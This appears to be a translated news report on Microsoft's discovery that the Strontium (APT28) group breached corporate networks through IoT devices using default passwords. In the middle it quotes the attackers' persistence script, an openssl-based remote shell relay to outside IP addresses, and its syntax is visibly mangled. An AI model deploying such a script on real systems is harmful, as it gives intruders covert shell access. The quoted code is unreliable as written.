The goal is VOIP phones, office printers and video decoders.
Specialists from the Microsoft Threat Analysis Center discovered attacks on corporate networks through the Internet of Things devices by the Strontium group. In some cases, hackers did not even have to crack anything: it was enough to enter factory passwords.
Microsoft has discovered at least three cases of such attacks. Attackers tried to access the internal network through a VOIP phone, an office printer, and a video decoder. In two cases, it was enough to enter the factory password, and the last security update was not installed on the third device.
Devices used as entry points. Through them, hackers entered the network and began to scan it in search of other insecure devices with high-privileged accounts.
After gaining access to each of the devices, the attackers installed a script for sniffing (intercepting) traffic on the local network. When moving between devices, hackers also implemented a script to root in the system.
—Contents of [IOT Device] file–
#! / bin / sh
export [IOT Device] = “- qws -display: 1 -nomouse”
echo 1 | tee /tmp/.c;sh -c ‘(until (sh -c “openssl s_client -quiet -host
188.8.131.52 -port 443 | while:; do sh && break; done | openssl
s_client -quiet -host 184.108.40.206 -port 443 “); do (sleep 10 &&
cn = $ ((`cat /tmp/.c`+1)) && echo $ cn | tee /tmp.c && if [$ cn -ge 30];
then (rm /tmp/.c;pkill -f ‘openssl’); fi); done) & ‘&
–end contents of file–
script to maintain the presence of hackers on the network
Microsoft found out that attackers controlled devices using a remote server from IP addresses 220.127.116.11, 18.104.22.168, 22.214.171.124, 126.96.36.199 and 188.8.131.52. Experts believe that hackers are associated with the Strontium group (“Strontium”), also known as Fancy Bear and APT28.
Cybersecurity experts and the media claim that Fancy Bear is affiliated with the Russian government. The group is credited with hacking the US Democratic Party in 2016, attempts to hack American officials and hinder the European elections in 2019.
Since Microsoft noticed the attacks on the Internet of Things devices in the early stages, experts did not establish the ultimate goal of the hackers. According to the company, over the past 12 months alone, employees have sent out 1,400 notifications of Strontium attacks around the world. Most of the goals were in the state, IT, military, defense, medical, educational and engineering fields.